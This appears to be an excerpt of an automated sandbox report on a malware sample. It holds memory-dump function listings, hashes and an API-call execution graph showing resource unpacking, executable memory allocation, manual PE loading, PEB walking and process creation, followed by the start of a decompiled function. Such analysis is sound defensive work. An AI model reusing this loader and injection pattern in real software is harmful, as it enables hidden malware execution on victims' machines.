                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 032D0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Executed Functions

                                                                                                                      Function 000007FF00260A21 Relevance: .3, Instructions: 276COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.670562859.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7ff00260000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 028f2bbf468e24f7d59ae89f571e44e34067635ce459d5912cc9809164f3a994
                                                                                                                      • Instruction ID: 7bb600172fb8a8fed12e76d7d56e03b16b9d9d8dcef7397a0dbf07cb2b414317
                                                                                                                      • Opcode Fuzzy Hash: 028f2bbf468e24f7d59ae89f571e44e34067635ce459d5912cc9809164f3a994
                                                                                                                      • Instruction Fuzzy Hash: 5A51AD21A0EBC60FDB53577858A97617FF0EF57204F1A40EBE488CB1E3D958985AC362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000007FF002608A5 Relevance: .2, Instructions: 173COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.670562859.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7ff00260000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2fb011615222e6a16c6f6bf6a8b44f59ea67582a42ffacd0e5d633ffbe3626f4
                                                                                                                      • Instruction ID: dbc328298a27624cc93ab4d08c1240dc3a231b24d745d3a12ca813d9fac77c8f
                                                                                                                      • Opcode Fuzzy Hash: 2fb011615222e6a16c6f6bf6a8b44f59ea67582a42ffacd0e5d633ffbe3626f4
                                                                                                                      • Instruction Fuzzy Hash: 8731106194F7C24FE713977858A96A17FB09F57210B0E04EBD088CF0E3E54C999AD362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:19.9%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23
                                                                                                                      execution_graph 31784 10035042 TlsGetValue 31785 10035076 GetModuleHandleA 31784->31785 31786 10035055 31784->31786 31788 10035085 GetProcAddress 31785->31788 31789 1003509f 31785->31789 31786->31785 31787 1003505f TlsGetValue 31786->31787 31791 1003506a 31787->31791 31790 1003506e 31788->31790 31790->31789 31792 10035095 RtlEncodePointer 31790->31792 31791->31785 31791->31790 31792->31789 31793 10020c26 31794 10020c32 __EH_prolog3 31793->31794 31796 10020c80 31794->31796 31804 1002083b EnterCriticalSection 31794->31804 31818 100201f1 RaiseException __CxxThrowException@8 31794->31818 31819 1002094b TlsAlloc InitializeCriticalSection 31794->31819 31820 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31796->31820 31799 10020c8d 31801 10020ca6 ~_Task_impl 31799->31801 31802 10020c93 31799->31802 31821 100209ed 88 API calls 4 library calls 31802->31821 31810 1002085a 31804->31810 31805 10020916 _memset 31806 1002092a LeaveCriticalSection 31805->31806 31806->31794 31807 10020893 31822 10014460 31807->31822 31808 100208a8 GlobalHandle GlobalUnlock 31809 10014460 ctype 80 API calls 31808->31809 31813 100208c5 GlobalReAlloc 31809->31813 31810->31805 31810->31807 31810->31808 31814 100208cf 31813->31814 31815 100208f7 GlobalLock 31814->31815 31816 100208da GlobalHandle GlobalLock 31814->31816 31817 100208e8 LeaveCriticalSection 31814->31817 31815->31805 31816->31817 31817->31815 31819->31794 31820->31799 31821->31801 31823 10014477 ctype 31822->31823 31824 1001448c GlobalAlloc 31823->31824 31826 10013ba0 80 API calls ctype 31823->31826 31824->31814 31826->31824 31827 10030d06 31828 10030d12 31827->31828 31829 10030d0d 31827->31829 31833 10030c10 31828->31833 31845 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31829->31845 31832 10030d23 31834 10030c1c __close 31833->31834 31835 10030c69 31834->31835 31842 10030cb9 __close 31834->31842 31846 10030a37 31834->31846 31835->31842 31900 100125c0 31835->31900 31839 10030c99 31840 10030a37 __CRT_INIT@12 165 API calls 31839->31840 31839->31842 31840->31842 31841 100125c0 ___DllMainCRTStartup 146 API calls 31843 10030c90 31841->31843 31842->31832 31844 10030a37 __CRT_INIT@12 165 API calls 31843->31844 31844->31839 31845->31828 31847 10030b61 31846->31847 31848 10030a4a GetProcessHeap HeapAlloc 31846->31848 31849 10030b9c 31847->31849 31858 10030b67 31847->31858 31850 10030a6e GetVersionExA 31848->31850 31857 10030a67 31848->31857 31853 10030ba1 31849->31853 31854 10030bfa 31849->31854 31851 10030a89 GetProcessHeap HeapFree 31850->31851 31852 10030a7e GetProcessHeap HeapFree 31850->31852 31855 10030ab5 31851->31855 31852->31857 31932 10035135 6 API calls __decode_pointer 31853->31932 31854->31857 31967 10035425 79 API calls 2 library calls 31854->31967 31922 10036624 HeapCreate 31855->31922 31857->31835 31858->31857 31859 10030b86 31858->31859 31948 100310be 67 API calls _doexit 31858->31948 31859->31857 31949 100389ee 68 API calls ___freetlocinfo 31859->31949 31860 10030ba6 31933 10035840 31860->31933 31865 10030aeb 31865->31857 31868 10030af4 31865->31868 31939 1003548e 78 API calls 6 library calls 31868->31939 31869 10030b90 31950 10035178 70 API calls 2 library calls 31869->31950 31870 10030bbe 31952 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31870->31952 31874 10030af9 __RTC_Initialize 31877 10030afd 31874->31877 31881 10030b0c GetCommandLineA 31874->31881 31875 10030b95 31951 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31875->31951 31876 10030bd0 31882 10030bd7 31876->31882 31883 10030bee 31876->31883 31940 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31877->31940 31880 10030b02 31880->31857 31941 10038d66 77 API calls 3 library calls 31881->31941 31953 100351b5 67 API calls 4 library calls 31882->31953 31954 1002fa69 31883->31954 31887 10030b1c 31942 100387ae 72 API calls 3 library calls 31887->31942 31888 10030bde GetCurrentThreadId 31888->31857 31890 10030b26 31891 10030b2a 31890->31891 31944 10038cad 111 API calls 3 library calls 31890->31944 31943 10035178 70 API calls 2 library calls 31891->31943 31894 10030b36 31895 10030b4a 31894->31895 31945 10038a3a 110 API calls 6 library calls 31894->31945 31895->31880 31947 100389ee 68 API calls ___freetlocinfo 31895->31947 31898 10030b3f 31898->31895 31946 10030f4d 75 API calls 4 library calls 31898->31946 31993 10006a90 31900->31993 31903 1001265a 32027 1002fe65 105 API calls 7 library calls 31903->32027 31904 1001261c FindResourceW LoadResource SizeofResource 31907 10006a90 ___DllMainCRTStartup 67 API calls 31904->31907 31910 10012744 ___DllMainCRTStartup 31907->31910 31909 1001284d 31909->31839 31909->31841 31911 100127b7 VirtualAlloc 31910->31911 31912 1001279b VirtualAllocExNuma 31910->31912 31913 100127da 31911->31913 31912->31913 31998 1002fb00 31913->31998 31917 100127fa 32021 10002970 31917->32021 31919 10012810 ___DllMainCRTStartup 32024 100026a0 31919->32024 31921 10012664 32028 1002f81e 5 API calls __invoke_watson 31921->32028 31923 10036647 31922->31923 31924 10036644 31922->31924 31968 100365c9 67 API calls 3 library calls 31923->31968 31924->31865 31926 1003664c 31927 10036656 31926->31927 31928 1003667a 31926->31928 31969 10035aca HeapAlloc 31927->31969 31928->31865 31930 10036660 31930->31928 31931 10036665 HeapDestroy 31930->31931 31931->31924 31932->31860 31936 10035844 31933->31936 31935 10030bb2 31935->31857 31935->31870 31936->31935 31937 10035864 Sleep 31936->31937 31970 10030678 31936->31970 31938 10035879 31937->31938 31938->31935 31938->31936 31939->31874 31940->31880 31941->31887 31942->31890 31943->31877 31944->31894 31945->31898 31946->31895 31947->31891 31948->31859 31949->31869 31950->31875 31951->31857 31952->31876 31953->31888 31955 1002fa75 __close 31954->31955 31956 1002fab4 31955->31956 31962 1002faee __close _realloc 31955->31962 31989 10035a99 67 API calls 2 library calls 31955->31989 31957 1002fac9 HeapFree 31956->31957 31956->31962 31959 1002fadb 31957->31959 31957->31962 31992 100311f4 67 API calls __getptd_noexit 31959->31992 31961 1002fae0 GetLastError 31961->31962 31962->31880 31963 1002faa6 31991 1002fabf LeaveCriticalSection _doexit 31963->31991 31964 1002fa8c ___sbh_find_block 31964->31963 31990 10035b3d VirtualFree VirtualFree HeapFree __cftoe2_l 31964->31990 31967->31857 31968->31926 31969->31930 31971 10030684 __close 31970->31971 31972 1003069c 31971->31972 31982 100306bb _memset 31971->31982 31983 100311f4 67 API calls __getptd_noexit 31972->31983 31974 100306a1 31984 10037753 4 API calls 2 library calls 31974->31984 31976 1003072d RtlAllocateHeap 31976->31982 31979 100306b1 __close 31979->31936 31982->31976 31982->31979 31985 10035a99 67 API calls 2 library calls 31982->31985 31986 100362e6 5 API calls 2 library calls 31982->31986 31987 10030774 LeaveCriticalSection _doexit 31982->31987 31988 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 31982->31988 31983->31974 31985->31982 31986->31982 31987->31982 31988->31982 31989->31964 31990->31963 31991->31956 31992->31961 31994 1002f9a6 _malloc 67 API calls 31993->31994 31995 10006aa1 31994->31995 31996 1002fa69 ___freetlocinfo 67 API calls 31995->31996 31997 10006aad 31995->31997 31996->31997 31997->31903 31997->31904 31999 1002fb18 31998->31999 32000 1002fb3f __VEC_memcpy 31999->32000 32001 100127eb 31999->32001 32000->32001 32002 1002f9a6 32001->32002 32003 1002fa53 32002->32003 32014 1002f9b4 32002->32014 32036 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32003->32036 32005 1002fa59 32037 100311f4 67 API calls __getptd_noexit 32005->32037 32008 1002fa5f 32008->31917 32011 1002fa17 RtlAllocateHeap 32011->32014 32012 1002f9c9 32012->32014 32029 10036892 67 API calls 2 library calls 32012->32029 32030 100366f2 67 API calls 7 library calls 32012->32030 32031 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32012->32031 32014->32011 32014->32012 32015 1002fa4a 32014->32015 32016 1002fa3e 32014->32016 32019 1002fa3c 32014->32019 32032 1002f957 67 API calls 4 library calls 32014->32032 32033 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32014->32033 32015->31917 32034 100311f4 67 API calls __getptd_noexit 32016->32034 32035 100311f4 67 API calls __getptd_noexit 32019->32035 32022 1002f9a6 _malloc 67 API calls 32021->32022 32023 10002990 32022->32023 32023->31919 32038 10002280 32024->32038 32027->31921 32028->31909 32029->32012 32030->32012 32032->32014 32033->32014 32034->32019 32035->32015 32036->32005 32037->32008 32075 10001990 32038->32075 32041 100022c3 SetLastError 32072 100022a9 32041->32072 32042 100022d5 32043 10001990 ___DllMainCRTStartup SetLastError 32042->32043 32044 100022ee 32043->32044 32045 10002310 SetLastError 32044->32045 32046 10002322 32044->32046 32044->32072 32045->32072 32047 10002331 SetLastError 32046->32047 32048 10002343 32046->32048 32047->32072 32049 1000234e SetLastError 32048->32049 32051 10002360 GetNativeSystemInfo 32048->32051 32049->32072 32052 10002414 SetLastError 32051->32052 32053 10002426 VirtualAlloc 32051->32053 32052->32072 32054 10002472 GetProcessHeap HeapAlloc 32053->32054 32055 10002447 VirtualAlloc 32053->32055 32057 100024ac 32054->32057 32058 1000248c VirtualFree SetLastError 32054->32058 32055->32054 32056 10002463 SetLastError 32055->32056 32056->32072 32059 10001990 ___DllMainCRTStartup SetLastError 32057->32059 32058->32072 32060 1000250e 32059->32060 32061 1000251c VirtualAlloc 32060->32061 32069 10002512 32060->32069 32062 1000254b ___DllMainCRTStartup 32061->32062 32078 100019c0 32062->32078 32065 1000257f ___DllMainCRTStartup 32065->32069 32088 10001ff0 32065->32088 32113 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32069->32113 32070 100025e8 ___DllMainCRTStartup 32070->32069 32070->32072 32107 2cd80c 32070->32107 32072->31921 32073 1000264f SetLastError 32073->32069 32076 100019ab 32075->32076 32077 1000199f SetLastError 32075->32077 32076->32041 32076->32042 32076->32072 32077->32076 32079 100019f0 32078->32079 32080 10001a83 32079->32080 32081 10001a2c VirtualAlloc 32079->32081 32087 10001aa0 ___DllMainCRTStartup 32079->32087 32082 10001990 ___DllMainCRTStartup SetLastError 32080->32082 32083 10001a50 32081->32083 32085 10001a57 ___DllMainCRTStartup 32081->32085 32084 10001a9c 32082->32084 32083->32087 32086 10001aa4 VirtualAlloc 32084->32086 32084->32087 32085->32079 32086->32087 32087->32065 32089 10002029 IsBadReadPtr 32088->32089 32098 1000201f 32088->32098 32091 10002053 32089->32091 32089->32098 32092 10002085 SetLastError 32091->32092 32093 10002099 32091->32093 32091->32098 32092->32098 32114 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32093->32114 32095 100020b3 32096 100020bf SetLastError 32095->32096 32100 100020e9 32095->32100 32096->32098 32098->32069 32101 10001cb0 32098->32101 32099 100021f9 SetLastError 32099->32098 32100->32098 32100->32099 32105 10001cf8 ___DllMainCRTStartup 32101->32105 32102 10001e01 32103 10001b80 ___DllMainCRTStartup 2 API calls 32102->32103 32106 10001ddd 32103->32106 32105->32102 32105->32106 32115 10001b80 32105->32115 32106->32070 32108 2cd8cc 32107->32108 32109 2cd8a5 32107->32109 32108->32072 32108->32073 32122 2c5cf9 32109->32122 32113->32072 32114->32095 32116 10001b9c 32115->32116 32119 10001b92 32115->32119 32117 10001c04 VirtualProtect 32116->32117 32120 10001baa 32116->32120 32117->32119 32119->32105 32120->32119 32121 10001be2 VirtualFree 32120->32121 32121->32119 32124 2c6288 32122->32124 32123 2c648d 32146 2b9700 32123->32146 32124->32123 32127 2c648b 32124->32127 32131 2bab66 GetPEB 32124->32131 32134 2bae03 GetPEB 32124->32134 32138 2cfc96 32124->32138 32142 2bea7b 32124->32142 32156 2d1310 32124->32156 32160 2d12a8 GetPEB 32124->32160 32161 2be7ce GetPEB 32124->32161 32162 2ce35a GetPEB 32124->32162 32127->32108 32135 2c3cbb 32127->32135 32131->32124 32134->32124 32136 2b2d9f GetPEB 32135->32136 32137 2c3d36 ExitProcess 32136->32137 32137->32108 32139 2cfcac 32138->32139 32163 2b2d9f 32139->32163 32143 2bea9f 32142->32143 32144 2b2d9f GetPEB 32143->32144 32145 2beb24 SHGetFolderPathW 32144->32145 32145->32124 32147 2b972e 32146->32147 32148 2d1310 GetPEB 32147->32148 32149 2b9995 32148->32149 32171 2c679c 32149->32171 32151 2b99d1 32152 2b99dc 32151->32152 32175 2c4dad GetPEB 32151->32175 32152->32127 32154 2b99fc 32176 2c4dad GetPEB 32154->32176 32157 2d132d 32156->32157 32177 2b3efe 32157->32177 32160->32124 32161->32124 32162->32124 32164 2b2e5b 32163->32164 32165 2b2e80 lstrcmpiW 32163->32165 32169 2cc761 GetPEB 32164->32169 32165->32124 32167 2b2e6a 32170 2bf2c1 GetPEB 32167->32170 32169->32167 32170->32165 32172 2c67d5 32171->32172 32173 2b2d9f GetPEB 32172->32173 32174 2c6847 CreateProcessW 32173->32174 32174->32151 32175->32154 32176->32152 32178 2b3f17 32177->32178 32181 2b3cd1 32178->32181 32182 2b3cec 32181->32182 32183 2b2d9f GetPEB 32182->32183 32184 2b3d79 32183->32184 32184->32124

                                                                                                                      Executed Functions

                                                                                                                      Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 63 100023c7-100023cd 57->63 58->63 59->41 61 10002472-1000248a GetProcessHeap HeapAlloc 60->61 62 10002447-10002461 VirtualAlloc 60->62 65 100024ac-10002510 call 10001990 61->65 66 1000248c-100024a7 VirtualFree SetLastError 61->66 62->61 64 10002463-1000246d SetLastError 62->64 67 100023d5 63->67 68 100023cf-100023d2 63->68 64->41 72 10002512 65->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 65->73 66->41 67->54 68->67 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 102 10002621-10002643 call 2cd80c 100->102 103 1000266a-10002678 100->103 104 10002687-1000268a 101->104 106 10002646-1000264d 102->106 105 1000267b 103->105 104->41 105->104 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C5CF9 Relevance: 10.3, Strings: 8, Instructions: 349COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 148 2c5cf9-2c6280 149 2c6288-2c628e 148->149 150 2c646c-2c647a call 2ce35a 149->150 151 2c6294-2c629a 149->151 161 2c647f-2c6485 150->161 152 2c648d-2c64ad call 2b9700 151->152 153 2c62a0-2c62a6 151->153 162 2c64b2-2c64b7 152->162 155 2c62ac-2c62b2 153->155 156 2c6427-2c642d 153->156 159 2c6368-2c638e call 2bea7b 155->159 160 2c62b8-2c62be 155->160 163 2c642f-2c6433 156->163 164 2c6462-2c6467 156->164 174 2c6393-2c6422 call 2d12a8 call 2bab66 call 2be7ce call 2bae03 159->174 168 2c6337-2c6363 call 2d1310 160->168 169 2c62c0-2c62c6 160->169 161->149 170 2c648b 161->170 171 2c64b8-2c64c4 162->171 165 2c645a-2c6460 163->165 166 2c6435-2c643c 163->166 164->149 165->163 165->164 172 2c644a-2c6453 166->172 168->149 169->161 175 2c62cc-2c6303 call 2bab66 call 2cfc96 169->175 170->171 177 2c643e-2c6442 172->177 178 2c6455-2c6457 172->178 174->149 187 2c6308-2c6332 call 2bae03 175->187 177->178 181 2c6444-2c6447 177->181 178->165 181->172 187->161
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002C5CF9() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
